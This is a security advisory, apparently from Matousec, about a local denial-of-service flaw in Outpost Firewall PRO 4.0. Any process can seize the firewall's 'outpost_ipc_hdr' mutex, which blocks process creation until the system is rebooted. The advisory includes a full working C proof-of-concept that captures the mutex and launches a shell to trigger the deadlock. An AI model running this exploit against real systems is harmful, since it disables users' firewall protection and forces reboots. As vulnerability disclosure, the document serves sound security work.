A vulnerability in the way Outpost Firewall handles an internal mutex named outpost_ipc_hdr allows a local attacker to capture the mutex. Outpost then misbehaves, and the user is forced to reboot the system.
Credit:
The information has been provided by Matousec - Transparent security Research.
The original article can be found at: http://www.matousec.com/info/advisories/Outpost-Enforcing-system-reboot-with-outpost_ipc_hdr-mutex.php
Vulnerable software:
* Outpost Firewall PRO 4.0 (1007.591.145)
* Outpost Firewall PRO 4.0 (964.582.059)
Outpost insufficiently protects its own mutex, outpost_ipc_hdr. An arbitrary process is able to open and capture this mutex. When that happens, Outpost cannot use the mutex for its own synchronization, and its internal mechanisms block when they try to acquire it. Outpost uses this mutex every time a potentially dangerous operation is executed, so, for example, no new processes can be started while the mutex is locked. After the mutex is released, all blocked operations complete. However, the release cannot be enforced from outside the process that holds the mutex, so the user is forced to reboot the system.
Exploit:
/*
Testing program for Enforcing system reboot with "outpost_ipc_hdr" mutex (BTP00002P004AO)
Usage:
prog
(the program is executed without special arguments)
Description:
This program calls standard Windows API to open and capture mutex. Then an attempt to create a child process
causes the deadlock. To terminate this testing program and to release the mutex press Ctrl+C.
Test:
Running the testing program.
*/
#include <stdio.h>
#include <windows.h>
#include <ddk/ntapi.h>
/* Write the test program's banner (title, project, copyright, URL) to stdout. */
void about(void)
{
    static const char *const banner[] = {
        "Testing program for Enforcing system reboot with \"outpost_ipc_hdr\" mutex (BTP00002P004AO)\n",
        "Windows Personal Firewall analysis project\n",
        "Copyright 2007 by Matousec - Transparent security\n",
        "http://www.matousec.com/\n\n",
    };
    size_t i;

    /* Emit the lines in order; the last entry carries the trailing blank line. */
    for (i = 0; i < sizeof banner / sizeof banner[0]; i++) {
        fputs(banner[i], stdout);
    }
}
/* Write the usage text to stdout; the program accepts no arguments. */
void usage(void)
{
    static const char text[] =
        "Usage: test\n"
        " (the program is executed without special arguments)\n";

    fputs(text, stdout);
}
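/*
 * Report the calling thread's last Win32 error on stderr: the numeric code
 * followed by the system-provided message text.
 *
 * The ANSI variant FormatMessageA is called explicitly so that the buffer is
 * always a narrow string and matches the "%s" conversion, whether or not the
 * translation unit is built with UNICODE defined. DWORD is unsigned, so the
 * code is printed with "%lu".
 */
void print_last_error()
{
    /* Read the code first: later API calls may overwrite the last-error value. */
    DWORD code = GetLastError();
    LPSTR msg = NULL;

    /*
     * FORMAT_MESSAGE_IGNORE_INSERTS: no argument array is supplied, so insert
     * sequences in a system message must be left unexpanded rather than read
     * from a missing argument list.
     */
    DWORD len = FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER |
                               FORMAT_MESSAGE_FROM_SYSTEM |
                               FORMAT_MESSAGE_IGNORE_INSERTS,
                               NULL, code, 0, (LPSTR)&msg, 0, NULL);
    if (len == 0) {
        fprintf(stderr, "Unable to format error message for code %lu.\n", code);
        return;
    }

    fprintf(stderr, "Error code: %lu\n", code);
    fprintf(stderr, "Error message: %s", msg);

    /* The buffer was allocated by FormatMessageA (ALLOCATE_BUFFER); release it. */
    LocalFree(msg);
}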
/*
 * Open an existing named mutant (mutex) object by its object-manager path and
 * try to take ownership of it.
 *
 * name: narrow-string path of the object; main() passes
 *       "\\BaseNamedObjects\\outpost_ipc_hdr".
 * Returns the open handle when the wait returns WAIT_OBJECT_0 within 5000 ms.
 * Returns a null handle otherwise (written as 0 when the open fails and as
 * NULL when the wait does not succeed; in the latter case the handle is
 * closed first).
 *
 * NOTE(review): the advisory text attributes the issue to the product
 * insufficiently protecting this object. The open below requests
 * MUTANT_ALL_ACCESS; presumably a restrictive security descriptor on the
 * mutex would make that request fail for an unrelated process - confirm
 * against the vendor's fix.
 */
HANDLE capture_mutex(char *name)
{
/* Build a wide-character copy of the name in a fixed MAX_PATH buffer. */
/* NOTE(review): truncation/termination of namew is not checked; the only
   caller in this file passes a short literal. */
wchar_t namew[MAX_PATH];
snwprintf(namew,MAX_PATH,L"%S",name);
/* Wrap the wide name in the UNICODE_STRING / OBJECT_ATTRIBUTES pair that
   the native open call takes. */
UNICODE_STRING uniname;
RtlInitUnicodeString(&uniname,namew);
OBJECT_ATTRIBUTES oa;
InitializeObjectAttributes(&oa,&uniname,OBJ_CASE_INSENSITIVE | OBJ_OPENIF,0,NULL);
HANDLE mutex;
DWORD access=MUTANT_ALL_ACCESS;
NTSTATUS status=ZwOpenMutant(&mutex,access,&oa);
/* Open refused or object absent: nothing to close, report failure. */
if (!NT_SUCCESS(status)) return 0;
printf("Mutex opened.\n");
/* Wait up to 5 seconds for ownership; only WAIT_OBJECT_0 counts as success. */
if (WaitForSingleObject(mutex,5000)==WAIT_OBJECT_0) return mutex;
/* Ownership not obtained: drop the handle so it is not leaked. */
ZwClose(mutex);
return NULL;
}
/*
 * Test driver: prints the banner, rejects any command-line arguments, then
 * loops calling capture_mutex() on the Outpost mutex and starting a shell.
 *
 * The loop ends only through the break taken when capture_mutex() returns a
 * null handle, so every exit path prints "TEST FAILED!" and returns 1. Per
 * the header comment of this file, the expected outcome on an affected
 * system is that the child-process creation blocks and the program has to be
 * ended with Ctrl+C.
 */
int main(int argc,char **argv)
{
about();
/* argc==1 means no arguments beyond the program name. */
if (argc!=1)
{
usage();
return 1;
}
while (1)
{
/* Each pass opens a new handle; main never closes the returned handle. */
HANDLE mutex=capture_mutex("\\BaseNamedObjects\\outpost_ipc_hdr");
if (mutex)
{
printf("Mutex captured.\n"
"Running system shell. This action will block the system.\n");
/* Process creation is the operation the advisory describes as blocked
   while the mutex is held. */
WinExec("cmd",SW_NORMAL);
} else
{
/* Capture refused or timed out: the test cannot demonstrate the issue. */
fprintf(stderr,"Unable to capture \"outpost_ipc_hdr\" mutex.\n");
break;
}
}
printf("\nTEST FAILED!\n");
return 1;
}